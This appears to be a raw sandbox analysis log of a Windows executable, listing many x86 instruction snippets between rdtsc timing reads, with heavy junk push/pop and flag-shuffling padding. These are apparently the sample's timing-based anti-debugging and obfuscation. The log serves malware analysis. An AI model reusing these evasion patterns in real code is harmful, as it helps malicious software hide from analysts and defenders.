Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB2211 second address: AB2238 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push esi 0x0000000b jnc 00007F661CE75E8Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB2238 second address: AB223E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB223E second address: AB2242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABF125 second address: ABF148 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Bh 0x00000007 jp 00007F661D45143Eh 0x0000000d jl 00007F661D451436h 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABF148 second address: ABF14C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABF14C second address: ABF150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABF150 second address: ABF158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABF158 second address: ABF160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABF160 second address: ABF16C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABF16C second address: ABF170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC1717 second address: AC1721 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F661CE75E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC135C second address: AC1364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC1364 second address: AC1368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC14C6 second address: AC14D0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F661D451436h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC14D0 second address: AC14E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F661CE75E86h 0x0000000e ja 00007F661CE75E86h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC6D81 second address: AC6D85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD786B second address: AD7875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F661CE75E86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD8B7C second address: AD8B9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451449h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD8B9D second address: AD8BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD8BA1 second address: AD8BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE7E12 second address: AE7E18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9F9E second address: AE9FA3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFC857 second address: AFC85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFC85C second address: AFC862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFC862 second address: AFC866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFFDFF second address: AFFE16 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007F661D451436h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFFE16 second address: AFFE1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFFE1A second address: AFFE26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F661D451436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AFFF60 second address: AFFF66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B02441 second address: B0244C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007F661D451436h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1926B second address: B1928D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F661CE75E8Ah 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F661CE75E8Ah 0x00000015 jc 00007F661CE75E88h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1928D second address: B192A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661D45143Eh 0x00000009 jnl 00007F661D451436h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B192A5 second address: B192B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jno 00007F661CE75E86h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B19422 second address: B19428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B19586 second address: B195B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F661CE75E86h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F661CE75E8Ch 0x00000012 jmp 00007F661CE75E92h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B19BE9 second address: B19BF1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B19EE9 second address: B19F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 ja 00007F661CE75E86h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 js 00007F661CE75E9Eh 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b pop edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push edi 0x0000001f pop edi 0x00000020 je 00007F661CE75E86h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B19F0F second address: B19F13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1B916 second address: B1B92D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E93h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1B92D second address: B1B941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnc 00007F661D451436h 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1B941 second address: B1B94E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 js 00007F661CE75E86h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1B94E second address: B1B958 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F661D451436h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1B958 second address: B1B969 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 js 00007F661CE75E86h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1E345 second address: B1E34A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1E34A second address: B1E37B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jne 00007F661CE75E86h 0x00000012 jmp 00007F661CE75E94h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1E37B second address: B1E37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1E860 second address: B1E866 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1E866 second address: B1E88C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F661D45143Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F661D45143Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1E88C second address: B1E8C9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F661CE75E9Fh 0x00000008 jmp 00007F661CE75E99h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F661CE75E93h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1E8C9 second address: B1E8D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1E8D4 second address: B1E8E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1E8E1 second address: B1E8F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1E8F0 second address: B1E8F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B1FACE second address: B1FADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B215D2 second address: B215D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B215D6 second address: B215EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F661D45143Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B215EA second address: B215F1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B215F1 second address: B215FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jo 00007F661D451436h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A358A8 second address: A358C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F661CE75E8Eh 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A358C7 second address: A358CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A35A50 second address: A35A56 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 544032E second address: 5440334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5440334 second address: 5440338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5440338 second address: 54403B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F661D451447h 0x00000013 sub ah, 0000002Eh 0x00000016 jmp 00007F661D451449h 0x0000001b popfd 0x0000001c mov ah, 40h 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 jmp 00007F661D451443h 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F661D451445h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54403B2 second address: 54403B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54403B8 second address: 54403DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D451443h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 movsx edi, ax 0x00000014 mov ebx, esi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54403DD second address: 54403F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F661CE75E94h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5440432 second address: 5440438 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5440438 second address: 5440459 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F661CE75E8Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5440459 second address: 5440468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661D45143Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470710 second address: 5470714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470714 second address: 547071A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547071A second address: 54707E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F661CE75E91h 0x00000011 and si, CA46h 0x00000016 jmp 00007F661CE75E91h 0x0000001b popfd 0x0000001c mov ax, 9CF7h 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 pushad 0x00000023 mov di, ax 0x00000026 mov cx, 200Bh 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d pushad 0x0000002e pushad 0x0000002f push ecx 0x00000030 pop ebx 0x00000031 movzx esi, dx 0x00000034 popad 0x00000035 pushfd 0x00000036 jmp 00007F661CE75E8Bh 0x0000003b sbb si, 862Eh 0x00000040 jmp 00007F661CE75E99h 0x00000045 popfd 0x00000046 popad 0x00000047 xchg eax, ecx 0x00000048 jmp 00007F661CE75E8Eh 0x0000004d push eax 0x0000004e pushad 0x0000004f mov dx, 9FC0h 0x00000053 popad 0x00000054 xchg eax, ecx 0x00000055 jmp 00007F661CE75E8Fh 0x0000005a xchg eax, esi 0x0000005b jmp 00007F661CE75E96h 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54707E0 second address: 54707E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54707E6 second address: 54707EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54707EC second address: 54707F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54707F0 second address: 5470859 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F661CE75E8Eh 0x00000011 lea eax, dword ptr [ebp-04h] 0x00000014 pushad 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F661CE75E8Ch 0x0000001c add si, 15F8h 0x00000021 jmp 00007F661CE75E8Bh 0x00000026 popfd 0x00000027 call 00007F661CE75E98h 0x0000002c pop eax 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 mov di, BA04h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470859 second address: 547086F instructions: 0x00000000 rdtsc 0x00000002 movsx edx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F661D45143Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547086F second address: 54708FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F661CE75E8Fh 0x00000009 xor esi, 401BB3CEh 0x0000000f jmp 00007F661CE75E99h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F661CE75E90h 0x0000001b add ax, 9448h 0x00000020 jmp 00007F661CE75E8Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 push eax 0x0000002a pushad 0x0000002b mov bx, 9DEAh 0x0000002f pushfd 0x00000030 jmp 00007F661CE75E8Bh 0x00000035 sub si, DE8Eh 0x0000003a jmp 00007F661CE75E99h 0x0000003f popfd 0x00000040 popad 0x00000041 nop 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54708FF second address: 5470906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, bh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470906 second address: 547091D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F661CE75E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547091D second address: 5470925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470925 second address: 547092B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547092B second address: 547092F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547092F second address: 5470933 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470971 second address: 5470975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470975 second address: 5470979 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470979 second address: 547097F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 547097F second address: 5470985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470985 second address: 5470989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470A1A second address: 5470A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470A20 second address: 5470A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5470A24 second address: 5470A60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, esi 0x0000000a jmp 00007F661CE75E8Fh 0x0000000f pop esi 0x00000010 jmp 00007F661CE75E96h 0x00000015 leave 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov dx, 5EF0h 0x0000001d movsx edx, cx 0x00000020 popad 0x00000021 rdtsc
